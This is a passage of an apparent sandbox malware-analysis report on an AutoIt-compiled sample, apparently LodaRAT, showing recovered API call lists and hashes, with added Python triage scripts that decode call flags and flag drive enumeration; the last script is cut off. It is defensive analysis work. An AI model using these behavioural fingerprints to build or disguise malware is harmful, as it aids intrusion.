                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: e8b0d82b299071900784d749a20e105a7f04c65d6dbe3df5b784bbedcf00fc72
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: EAC1AE733091934AEF2E463A847483EBAE15AA27B131B076DD5B3CF4D5EE34E524D620
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37caefa2e50feac5454f9ea760279e7ec3a3dc3a30a53b1fa09cacefa9542ccc
                                        • Instruction ID: 8aca65f4698ca1a3f00c23723ea0b7e84ef10795e69d22eaf23c773005c917f8
                                        • Opcode Fuzzy Hash: 37caefa2e50feac5454f9ea760279e7ec3a3dc3a30a53b1fa09cacefa9542ccc
                                        • Instruction Fuzzy Hash: 363192350AE2E18FCB13CF74D8E1A827BF0EF4B71531919DAD0808F566C265A056DB52
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 0037A7A5
                                        • DeleteObject.GDI32(00000000), ref: 0037A7B7
                                        • DestroyWindow.USER32 ref: 0037A7C5
                                        • GetDesktopWindow.USER32 ref: 0037A7DF
                                        • GetWindowRect.USER32(00000000), ref: 0037A7E6
                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0037A927
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0037A937
                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A97F
                                        • GetClientRect.USER32(00000000,?), ref: 0037A98B
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0037A9C5
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A9E7
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A9FA
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA05
                                        • GlobalLock.KERNEL32(00000000), ref: 0037AA0E
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA1D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0037AA26
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA2D
                                        • GlobalFree.KERNEL32(00000000), ref: 0037AA38
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0037AA4A
                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003AD9BC,00000000), ref: 0037AA60
                                        • GlobalFree.KERNEL32(00000000), ref: 0037AA70
                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0037AA96
                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0037AAB5
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AAD7
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037ACC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-3613752883
                                        • Opcode ID: b95a09002710937e4e551f52e6d1b8c3e66029d7134341614b7424082edec37b
                                        • Instruction ID: 6a7a1c13fae53ec3f7e082fcd98f95f266d5de67050854415bfbf06200742d3e
                                        • Opcode Fuzzy Hash: b95a09002710937e4e551f52e6d1b8c3e66029d7134341614b7424082edec37b
                                        • Instruction Fuzzy Hash: 8B028071900115EFDB26DFA4DC89EAE7BB9FF49310F008159F90AAB2A1D734AD41CB61
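The entries above are the raw per-function call lists the analyzer recovered: the CreateProcessW call at 0038E18B reached through sub-function 0038E13E, the pair of NtdllDialogWndProc_W thunks, and the routine that creates a window of class "AutoIt v3", reads a file into a global buffer and hands it to OleLoadPicture (the splash-image loader that the AutoIt3 runtime embedded in compiled scripts carries). Two checks a triager wants from such a listing are whether any process-creation call passes CREATE_SUSPENDED, the precondition for process hollowing, and which functions are near-duplicates by imported-API set. The script below is an added example, not Joe Sandbox output and not the sample's code: it parses a constructed excerpt of the entries above into records, decodes dwCreationFlags and dwDesiredAccess using the Windows SDK constant values, and compares functions by Jaccard overlap of their API sets. It assumes that an entry ends at its "Instruction Fuzzy Hash" line and that "String ID" joins strings with "$"; both are inferred from the report layout rather than documented.

```python
"""Triage helper for Joe Sandbox per-function "APIs / Similarity" entries.

Added example, not Joe Sandbox code. Assumptions: an entry ends at its
"Instruction Fuzzy Hash" line; "String ID" joins strings with "$".
"""
import re
from dataclasses import dataclass, field

# Constructed sample: four entries abbreviated from the report layout above
# (identifiers copied from the report, fields the parser does not use dropped).
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 0038E13E: _memset.LIBCMT ref: 0038E15C
  • Part of subcall function 0038E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
  • Part of subcall function 0038E13E: CloseHandle.KERNEL32 ref: 0038E19D
Similarity
• String ID:
• Opcode ID: 0b843b464d23d5e9901e7fa6e4614bf92feb40aa58e39610dd6e019cd72c7a53
• Instruction Fuzzy Hash: F1E04632100308DFCB12EF08DC44E9A37AAFB09340F018091FA015B2B1C731A920EF40
APIs
• NtdllDialogWndProc_W.NTDLL ref: 0038F3A1
Similarity
• Opcode ID: 817873d52c90054c3646b6f9a5e76eedaa521b8b89708d1c4f1a0f493a820b21
• Instruction Fuzzy Hash: 25E0173520424CEFCB02DF88DC84E8A3BA9FB1A350F040054FD058B361C771A830DB61
APIs
• NtdllDialogWndProc_W.NTDLL ref: 0038F3D0
Similarity
• Opcode ID: 33534dcdf8d09bb13f66d9a530805e44270d9edfb814c8f7e83d4a2304a54c2c
• Instruction Fuzzy Hash: 24E0173520024CEFCB02DF88D884E8A3BA9FB1A350F040054FD058B362C772A830EBA1
APIs
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A97F
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000), ref: 0037A9E7
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003AD9BC,00000000), ref: 0037AA60
Strings
Similarity
• String ID: $@U=u$AutoIt v3$DISPLAY$static
• Opcode ID: b95a09002710937e4e551f52e6d1b8c3e66029d7134341614b7424082edec37b
• Instruction Fuzzy Hash: 8B028071900115EFDB26DFA4DC89EAE7BB9FF49310F008159F90AAB2A1D734AD41CB61
"""

# One API call line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then "ref: <call-site address>".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z][A-Za-z ]*?):\s*(?P<val>.*)$")

# Windows SDK values (winbase.h / winnt.h) for the two argument slots decoded below.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x200: "CREATE_NEW_PROCESS_GROUP",
                  0x400: "CREATE_UNICODE_ENVIRONMENT", 0x8000000: "CREATE_NO_WINDOW"}
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
FLAG_ARGS = {"CreateProcessW": (5, CREATION_FLAGS),   # dwCreationFlags is argument 6
             "CreateFileW": (1, ACCESS_FLAGS)}        # dwDesiredAccess is argument 2
WATCHLIST = {"CreateProcessW", "OleLoadPicture", "SetUnhandledExceptionFilter"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int            # call-site address
    subcall: str = ""   # address of the sub-function the call was attributed to


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    opcode_id: str = ""
    instr_fuzzy: str = ""


def parse_entries(text):
    """Split report text into FunctionEntry records, one per function block."""
    entries, cur = [], FunctionEntry()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] or ""))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"].strip()
        if key == "Opcode ID":
            cur.opcode_id = val
        elif key == "String ID":
            cur.strings = [s for s in val.split("$") if s]    # "$" separator: assumption
        elif key == "Instruction Fuzzy Hash":                   # last field of an entry
            cur.instr_fuzzy = val
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def decode_flags(call):
    """Name the flag bits in the decoded argument slot; unknown bits are kept as hex."""
    spec = FLAG_ARGS.get(call.api)
    if not spec or len(call.args) <= spec[0] or call.args[spec[0]] == "?":
        return []
    value = int(call.args[spec[0]], 16)
    names = [name for bit, name in spec[1].items() if value & bit]
    rest = value & ~sum(spec[1])
    return names + ([hex(rest)] if rest else [])


def api_set(entry):
    return {c.api for c in entry.calls}


def triage(entries):
    """(opcode-id prefix, API, call site, decoded flags) for every watch-listed call."""
    return [(e.opcode_id[:8], c.api, c.ref, decode_flags(c))
            for e in entries for c in e.calls if c.api in WATCHLIST]


def similar_pairs(entries, threshold=0.5):
    """Function pairs whose API sets overlap (Jaccard) at or above the threshold."""
    out = []
    for i, a in enumerate(entries):
        for b in entries[i + 1:]:
            sa, sb = api_set(a), api_set(b)
            if sa and sb:
                score = len(sa & sb) / len(sa | sb)
                if score >= threshold:
                    out.append((a.opcode_id[:8], b.opcode_id[:8], round(score, 2)))
    return out


if __name__ == "__main__":
    ents = parse_entries(SAMPLE_REPORT)
    for opc, api, ref, flags in triage(ents):
        print(f"{opc} {api} @ {ref:08X} {flags}")
    print(similar_pairs(ents))
```

On the excerpt, the sixth CreateProcessW argument 0x20 decodes to NORMAL_PRIORITY_CLASS alone, so this call is a plain spawn with no CREATE_SUSPENDED; the CreateFileW access mask is GENERIC_READ, consistent with reading an image for OleLoadPicture rather than writing a payload; and the two dialog-procedure thunks score 1.0 against each other, which is the same thing the report's identical "API ID: DialogNtdllProc_" already states. Real reports repeat the Memory Dump Source block for every function, and the parser ignores those lines because it only reacts to the four fields it knows.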
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 0038D0EB
                                        • GetSysColorBrush.USER32(0000000F), ref: 0038D11C
                                        • GetSysColor.USER32(0000000F), ref: 0038D128
                                        • SetBkColor.GDI32(?,000000FF), ref: 0038D142
                                        • SelectObject.GDI32(?,00000000), ref: 0038D151
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0038D17C
                                        • GetSysColor.USER32(00000010), ref: 0038D184
                                        • CreateSolidBrush.GDI32(00000000), ref: 0038D18B
                                        • FrameRect.USER32(?,?,00000000), ref: 0038D19A
                                        • DeleteObject.GDI32(00000000), ref: 0038D1A1
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0038D1EC
                                        • FillRect.USER32(?,?,00000000), ref: 0038D21E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038D249
                                          • Part of subcall function 0038D385: GetSysColor.USER32(00000012), ref: 0038D3BE
                                          • Part of subcall function 0038D385: SetTextColor.GDI32(?,?), ref: 0038D3C2
                                          • Part of subcall function 0038D385: GetSysColorBrush.USER32(0000000F), ref: 0038D3D8
                                          • Part of subcall function 0038D385: GetSysColor.USER32(0000000F), ref: 0038D3E3
                                          • Part of subcall function 0038D385: GetSysColor.USER32(00000011), ref: 0038D400
                                          • Part of subcall function 0038D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0038D40E
                                          • Part of subcall function 0038D385: SelectObject.GDI32(?,00000000), ref: 0038D41F
                                          • Part of subcall function 0038D385: SetBkColor.GDI32(?,00000000), ref: 0038D428
                                          • Part of subcall function 0038D385: SelectObject.GDI32(?,?), ref: 0038D435
                                          • Part of subcall function 0038D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0038D454
                                          • Part of subcall function 0038D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0038D46B
                                          • Part of subcall function 0038D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0038D480
                                          • Part of subcall function 0038D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0038D4A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                        • String ID: @U=u
                                        • API String ID: 3521893082-2594219639
                                        • Opcode ID: 1a85740907f301b31912b9d828f8c580f571fd358f4847e1505b9f50d499aab4
                                        • Instruction ID: 0c96ca6fba4b66c606ffa3ec90e3acef1b43a856f76ab6480af6b789e0f4bcb3
                                        • Opcode Fuzzy Hash: 1a85740907f301b31912b9d828f8c580f571fd358f4847e1505b9f50d499aab4
                                        • Instruction Fuzzy Hash: B0919C72408301BFDB52AF64DC48E6BBBADFF8A320F100A19F962965E0D771D944CB52
                                        APIs
                                        • DestroyWindow.USER32(00000000), ref: 0037A42A
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0037A4E9
                                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0037A527
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0037A539
                                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0037A57F
                                        • GetClientRect.USER32(00000000,?), ref: 0037A58B
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0037A5CF
                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0037A5DE
                                        • GetStockObject.GDI32(00000011), ref: 0037A5EE
                                        • SelectObject.GDI32(00000000,00000000), ref: 0037A5F2
                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0037A602
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0037A60B
                                        • DeleteDC.GDI32(00000000), ref: 0037A614
                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0037A642
                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0037A659
                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0037A694
                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0037A6A8
                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0037A6B9
                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0037A6E9
                                        • GetStockObject.GDI32(00000011), ref: 0037A6F4
                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0037A6FF
                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0037A709
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                        • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                        • API String ID: 2910397461-2771358697
                                        • Opcode ID: ead0560e1d466ad45fea87e136f88fe593b6f6c24762ea8814efecc9b9c9090c
                                        • Instruction ID: 3726eb35c8ab25085cdc3400cfb6aaa6f737d9ef73e782f4b527fa73b55cd182
                                        • Opcode Fuzzy Hash: ead0560e1d466ad45fea87e136f88fe593b6f6c24762ea8814efecc9b9c9090c
                                        • Instruction Fuzzy Hash: 76A16F71A10215BFEB26DBA5DC8AFAE7BBDEB45710F008114F615AB2E0D774AD40CB60
                                        APIs
                                        • GetSysColor.USER32(00000012), ref: 0038D3BE
                                        • SetTextColor.GDI32(?,?), ref: 0038D3C2
                                        • GetSysColorBrush.USER32(0000000F), ref: 0038D3D8
                                        • GetSysColor.USER32(0000000F), ref: 0038D3E3
                                        • CreateSolidBrush.GDI32(?), ref: 0038D3E8
                                        • GetSysColor.USER32(00000011), ref: 0038D400
                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0038D40E
                                        • SelectObject.GDI32(?,00000000), ref: 0038D41F
                                        • SetBkColor.GDI32(?,00000000), ref: 0038D428
                                        • SelectObject.GDI32(?,?), ref: 0038D435
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0038D454
                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0038D46B
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0038D480
                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0038D4A8
                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0038D4CF
                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 0038D4ED
                                        • DrawFocusRect.USER32(?,?), ref: 0038D4F8
                                        • GetSysColor.USER32(00000011), ref: 0038D506
                                        • SetTextColor.GDI32(?,00000000), ref: 0038D50E
                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0038D522
                                        • SelectObject.GDI32(?,0038D0B5), ref: 0038D539
                                        • DeleteObject.GDI32(?), ref: 0038D544
                                        • SelectObject.GDI32(?,?), ref: 0038D54A
                                        • DeleteObject.GDI32(?), ref: 0038D54F
                                        • SetTextColor.GDI32(?,?), ref: 0038D555
                                        • SetBkColor.GDI32(?,?), ref: 0038D55F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                        • String ID: @U=u
                                        • API String ID: 1996641542-2594219639
                                        • Opcode ID: f78c9c672d6dd6adf70fc886666f6ab73c61fda333deb16306da0aaeebb10972
                                        • Instruction ID: e1d242fc989bd22e2c9d1290028d605d513deb3215ac1797ce568bb5aa0b04b8
                                        • Opcode Fuzzy Hash: f78c9c672d6dd6adf70fc886666f6ab73c61fda333deb16306da0aaeebb10972
                                        • Instruction Fuzzy Hash: B8515C71900208BFDF12AFA8DC48EAE7BB9FF09320F214555F912AB6A1D7719940CF50
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 0036E45E
                                        • GetDriveTypeW.KERNEL32(?,003BDC88,?,\\.\,003BDBF0), ref: 0036E54B
                                        • SetErrorMode.KERNEL32(00000000,003BDC88,?,\\.\,003BDBF0), ref: 0036E6B1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                         • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DriveType
                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                        • API String ID: 2907320926-4222207086
                                        • Opcode ID: 0230c396855d965e21cda6da60392b8fe7f9e504c537ba784d31f9a08ae60d69
                                        • Instruction ID: 72c8ebec1f69e49caa9749e6c9ec4186e0ea7831463cbc085ce984c212fcc4cf
                                        • Opcode Fuzzy Hash: 0230c396855d965e21cda6da60392b8fe7f9e504c537ba784d31f9a08ae60d69
                                        • Instruction Fuzzy Hash: 76511839218301ABC303DF14E8918AAB794BB55704F51C91BF442AB799DB70DE4DDB53
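The listings on this page are machine output from the Joe Sandbox IDA plugin. The function directly above (SetErrorMode around GetDriveTypeW, with the drive-type strings 1394, ATA, CDROM, Fixed, Removable, USB and the \\.\ device prefix) is the evidence behind the report's "Checks for available system drives" signature: SetErrorMode(00000001) is SEM_FAILCRITICALERRORS, which suppresses the "no disk in drive" dialog while every drive letter is probed, and the second SetErrorMode(00000000) restores the default. The CreateWindowExW call further up that passes the window class "AutoIt v3", together with the #include / #requireadmin / #OnAutoItStartRegister directive strings listed below, identifies the dropped executable as a compiled AutoIt stub, which is how LodaRAT is built. The Python below is an added example written for this page, not part of the Joe Sandbox report or of the sample: it parses bullets in this listing format and flags those two patterns. The regular expression is an assumption about the format based only on the line shapes seen on this page, and the sample bullets are copied from the listings here.

```python
"""Added example: parse Joe Sandbox IDA-plugin "APIs" listings and flag the call
combinations that back the report's signatures.  Not part of the report itself."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# One bullet of the listing.  Three shapes occur on this page:
#   • GetDriveTypeW.KERNEL32(?,003BDC88,?,\\.\,003BDBF0), ref: 0036E54B
#   • DestroyWindow.USER32 ref: 00324956                      (no argument list)
#   • Part of subcall function 003249CA: InvalidateRect.USER32(...), ref: 00324A23
# The pattern is an assumption derived from those shapes, not a published grammar.
_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple             # raw tokens; "?" means the plugin could not resolve the value
    ref: int                # call-site address in the dumped image
    subcall: Optional[int]  # callee address when the bullet is "Part of subcall function"


def parse_listing(text: str) -> list:
    """Return every API bullet in `text` as an ApiCall; all other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue  # "APIs", "Strings", hash and memory-dump lines
        raw = m.group("args")
        args = tuple(raw.split(",")) if raw else ()
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16), sub))
    return calls


def module_counts(calls: list) -> Counter:
    """How many calls go to each import module (KERNEL32, USER32, GDI32, ...)."""
    return Counter(c.module for c in calls)


# API sets that together explain a signature in the report; every API in the set
# must appear in the same function's listing.
PATTERNS = {
    # SetErrorMode(SEM_FAILCRITICALERRORS) before GetDriveTypeW hides the
    # "no disk in drive" dialog while drive letters are probed: the evidence
    # behind "Checks for available system drives".
    "drive enumeration": {"SetErrorMode", "GetDriveTypeW"},
}

# Window class of the AutoIt runtime's hidden main window; seeing it as a
# CreateWindowExW argument marks the binary as a compiled-AutoIt stub.
AUTOIT_WINDOW_CLASS = "AutoIt v3"


def match_patterns(calls: list) -> list:
    """Sorted names of the behaviour patterns satisfied by the parsed calls."""
    names = {c.api for c in calls}
    hits = [name for name, needed in PATTERNS.items() if needed <= names]
    if any(c.api == "CreateWindowExW" and AUTOIT_WINDOW_CLASS in c.args for c in calls):
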